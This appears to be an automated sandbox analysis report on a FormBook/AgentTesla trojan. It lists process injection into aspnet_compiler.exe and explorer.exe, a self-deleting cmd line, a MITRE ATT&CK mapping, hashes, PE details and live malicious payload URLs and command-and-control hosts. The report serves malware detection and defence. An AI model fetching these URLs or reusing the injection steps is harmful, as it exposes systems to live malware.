Source: U8RYIwIvfK.exe, u200b???????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Source: 0.0.U8RYIwIvfK.exe.240000.0.unpack, u200b???????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'OpenProcess@kernel32.dll'), ('?????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread register set: target process: 3452			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3452			Jump to behavior

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Users\user\Desktop\U8RYIwIvfK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.316353036.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.326808107.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.346736658.0000000005D90000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.342557160.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.271403938.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.316353036.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Queries volume information: C:\Users\user\Desktop\U8RYIwIvfK.exe VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	14_2_001B96A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,	14_2_001B5AEF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	14_2_001C3F80

Source: C:\Users\user\Desktop\U8RYIwIvfK.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001D3C49 GetSystemTime,SystemTimeToFileTime,

14_2_001D3C49

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 14_2_001B443C GetVersion,

14_2_001B443C

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.265897540.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.518748658.0000000000120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.333824119.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.354984308.000000000E1A1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.521754636.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.520146703.00000000023A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.268793282.0000000003668000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Rootkit	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Masquerading	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	812 Process Injection	1 Valid Accounts	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Disable or Modify Tools	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	812 Process Injection	DCSync	125 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	11 Deobfuscate/Decode Files or Information	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	3 Obfuscated Files or Information	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	11 Software Packing	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
U8RYIwIvfK.exe	44%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
U8RYIwIvfK.exe	38%	Virustotal		Browse
U8RYIwIvfK.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.0.aspnet_compiler.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
tgc8x.tk	6%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://tgc8x.tk/tt/ptrr.txt	3%	Virustotal		Browse
https://tgc8x.tk	7%	Virustotal		Browse
http://www.mercydm.mobi/zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt	0%	Avira URL Cloud	safe
https://tgc8x.tk	0%	Avira URL Cloud	safe
www.ept-egy.com/zx85/	0%	Virustotal		Browse
www.ept-egy.com/zx85/	0%	Avira URL Cloud	safe
http://tgc8x.tk	0%	Avira URL Cloud	safe
https://tgc8x.tk/tt/ptrr.txt	100%	Avira URL Cloud	phishing
https://tgc8x.tkD8	0%	Avira URL Cloud	safe
https://tgc8x.tk4	0%	Avira URL Cloud	safe
https://tgc8x.tk/tt/BLACKDEV.txt	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tgc8x.tk	50.115.174.192	true	true	6%, Virustotal, Browse	unknown
mercydm.mobi	34.102.136.180	true	false		unknown
www.mercydm.mobi	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tgc8x.tk/tt/BLACKDEV.txt	true	Avira URL Cloud: phishing	unknown
https://tgc8x.tk/tt/ptrr.txt	true	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
www.ept-egy.com/zx85/	true	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://www.mercydm.mobi/zx85/?Sl=JSAN+BGUWbFIio0Y6cR2moHwDIFZVOq3R3uV7C0AfntmXLYJvKIE34aC+rLPWCkZ7Yk0ST8b/A==&7ntH=U0D8yn_PIXqTt	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000004.00000000.295686843.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.352239311.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.315487552.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.270907548.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341973422.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tgc8x.tk	U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp	true	7%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://tgc8x.tk4	U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	U8RYIwIvfK.exe, 00000000.00000002.267402025.0000000002661000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tgc8x.tk	U8RYIwIvfK.exe, 00000000.00000002.267602853.0000000002677000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://tgc8x.tkD8	U8RYIwIvfK.exe, 00000000.00000002.268543578.0000000002755000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.115.174.192	tgc8x.tk	United States		32875	VIRPUS	true
34.102.136.180	mercydm.mobi	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736964
Start date and time:	2022-11-03 12:38:55 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	U8RYIwIvfK.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/1@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 60.4% (good quality ratio 54.2%) Quality average: 70.2% Quality standard deviation: 31.4%
HCA Information:	Successful, ratio: 99% Number of executed functions: 80 Number of non-executed functions: 338
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:40:00	API Interceptor	1x Sleep call for process: U8RYIwIvfK.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
50.115.174.192	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse
	CnptEaXHK7.exe	Get hash	malicious	Browse
	PO.exe	Get hash	malicious	Browse
	RFQ# 6000163267.js	Get hash	malicious	Browse
	WY220353098B.js	Get hash	malicious	Browse
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse
	vNrvIu0ujD.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	img664947593034645.exe	Get hash	malicious	Browse
	africa.exe	Get hash	malicious	Browse
	Ziraat Bankas Swift Mesaj.exe	Get hash	malicious	Browse
	RFQ.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tgc8x.tk	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse	50.115.174.192
	CnptEaXHK7.exe	Get hash	malicious	Browse	50.115.174.192
	PO.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ# 6000163267.js	Get hash	malicious	Browse	50.115.174.192
	WY220353098B.js	Get hash	malicious	Browse	50.115.174.192
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse	50.115.174.192
	vNrvIu0ujD.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	img664947593034645.exe	Get hash	malicious	Browse	50.115.174.192
	africa.exe	Get hash	malicious	Browse	50.115.174.192
	Ziraat Bankas Swift Mesaj.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ.exe	Get hash	malicious	Browse	50.115.174.192

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VIRPUS	DHL SHIPMENT INVOICE.js	Get hash	malicious	Browse	50.115.174.192
	CnptEaXHK7.exe	Get hash	malicious	Browse	50.115.174.192
	PO.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ# 6000163267.js	Get hash	malicious	Browse	50.115.174.192
	WY220353098B.js	Get hash	malicious	Browse	50.115.174.192
	PO-4290971524_11-2-2022.js	Get hash	malicious	Browse	50.115.174.192
	vNrvIu0ujD.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	img664947593034645.exe	Get hash	malicious	Browse	50.115.174.192
	africa.exe	Get hash	malicious	Browse	50.115.174.192
	Ziraat Bankas Swift Mesaj.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ.exe	Get hash	malicious	Browse	50.115.174.192

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	rzN2ckYW24.exe	Get hash	malicious	Browse	50.115.174.192
	Scan_Document_xls.exe	Get hash	malicious	Browse	50.115.174.192
	Remittance copy.exe	Get hash	malicious	Browse	50.115.174.192
	3qXE1Bpn92.exe	Get hash	malicious	Browse	50.115.174.192
	0Eot6HTp2y.exe	Get hash	malicious	Browse	50.115.174.192
	SecuriteInfo.com.Heur.MSIL.Bladabindi.1.28850.7667.exe	Get hash	malicious	Browse	50.115.174.192
	payment copy.exe	Get hash	malicious	Browse	50.115.174.192
	Payment copy.exe	Get hash	malicious	Browse	50.115.174.192
	SHIPPING DOC.exe	Get hash	malicious	Browse	50.115.174.192
	Payment advice.exe	Get hash	malicious	Browse	50.115.174.192
	RFQ103122-WOLF MACHINE INC.exe	Get hash	malicious	Browse	50.115.174.192
	New PO.exe	Get hash	malicious	Browse	50.115.174.192
	SecuriteInfo.com.Variant.Fragtor.155590.23683.28000.exe	Get hash	malicious	Browse	50.115.174.192
	payment copy.exe	Get hash	malicious	Browse	50.115.174.192
	KWIIR00322677.exe	Get hash	malicious	Browse	50.115.174.192
	file.exe	Get hash	malicious	Browse	50.115.174.192
	WELTER zahnrad GmbH Urgent enquiry Order nr543.exe	Get hash	malicious	Browse	50.115.174.192
	WIRE SWIFT COPY.exe	Get hash	malicious	Browse	50.115.174.192
	Gestempelte ge#U00e4nderte Bestellung.exe	Get hash	malicious	Browse	50.115.174.192
	October SOA.exe	Get hash	malicious	Browse	50.115.174.192

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\U8RYIwIvfK.exe.log

Download File

Process:	C:\Users\user\Desktop\U8RYIwIvfK.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.35816127824051
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXwYHKhQnoPtHoxHhAHKzva
MD5:	31E089E21A2AEB18A2A23D3E61EB2167
SHA1:	E873A8FC023D1C6D767A0C752582E3C9FD67A8B0
SHA-256:	2DCCE5D76F242AF36DB3D670C006468BEEA4C58A6814B2684FE44D45E7A3F836
SHA-512:	A0DB65C3E133856C0A73990AEC30B1B037EA486B44E4A30657DD5775880FB9248D9E1CB533420299D0538882E9A883BA64F30F7263EB0DD62D1C673E7DBA881D
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.8598559767101115
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	U8RYIwIvfK.exe
File size:	74240
MD5:	6f53598b9c19b30a0cf3ff0432301708
SHA1:	4bd8e67e468adfbfddd9e5a1e47fdf318bf9a31b
SHA256:	6d3397c687aea5017b90a5e96adc6fbfb0429d56a8b2ead1f1d4273994952379
SHA512:	e655648f950b90261fd2b54be1ebfee9780ff466351d1cc4b1a675c41329fc5eae62f20ccb9423d3ee4e3457c7a8ed63b14bc2e30f205a4512122301ce2d1541
SSDEEP:	1536:7BKK5PX8Q01Hb20oJ0fekpamVGfhCW7j:lKSx0177ouekpamVGfhCW7j
TLSH:	E573EC8D766071DFC85BC872CEA82C68EA64747B531BD203A45326AD9E0D99BCF150F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;cc..............0..............%... ...@....@.. ..............................w%....`................................

File Icon


Icon Hash:	30f0c4ccccc6b010

Static PE Info

General

Entrypoint:	0x4125ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63633BBE [Thu Nov 3 03:55:42 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x125a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x1746	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x16000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x12558	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x105f4	0x10600	False	0.4767861402671756	data	5.884370189804151	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x1746	0x1800	False	0.2711588541666667	data	4.422035362903512	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
